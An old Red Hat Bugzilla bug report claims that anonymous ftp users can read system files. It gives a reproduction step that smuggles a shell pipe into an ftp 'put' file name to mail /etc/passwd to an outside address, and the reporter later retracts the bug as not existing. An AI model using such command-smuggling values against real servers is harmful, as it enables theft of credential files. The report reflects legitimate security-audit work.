Bug 34249 - access to system files from anonymous ftp login
access to system files from anonymous ftp login
Product: Red Hat Linux
Classification: Retired
Component: ftp (Show other bugs)
i386 Linux
medium Severity medium
: ---
: ---
Assigned To: Bernhard Rosenkraenzer
David Lawrence
: Security
Depends On:
  Show dependency treegraph
Reported: 2001-03-31 17:43 EST by tim
Modified: 2007-04-18 12:32 EDT (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2001-04-02 17:45:11 EDT
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---

Attachments (Terms of Use)

  None (edit)
Description tim 2001-03-31 17:43:24 EST
From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

using put with special file names gives anonymous user access to
ftp server system files/resources. security issue

Reproducible: Always
Steps to Reproduce:
1.log in via ftp from rh6.2 system to server runing rh6.2 as user ftp 
passwd fred@fred.com
2.type put"|cat /etc/passwd|mail myname@mydomain.com"
3. then quit.


Actual Results:  you get an ftp error message but the ftp server's 
password file is emailed to the email specified
testing on my own email server with my own email address, i was emailed 
the system password file.

Expected Results:  an error message saying invalid file name

I haven't built another linux machine to test it from but it seems like a 
high security risk. It was descovered during a security  audit i was doing 
on our system. I have dissabled the ftp service for the moment until I 
know of a fix.
Comment 1 tim 2001-04-02 17:45:07 EDT
appologies, this bug was tested from the mail/ftp server as a guest user, and 
the local shell gave read acces to /etc/passwd so passwd file being emailed was 
that of the telnet session, not the ftp session.

bug does not exist as per further testing. - please remove

Note You need to log in before you can comment on or make changes to this bug.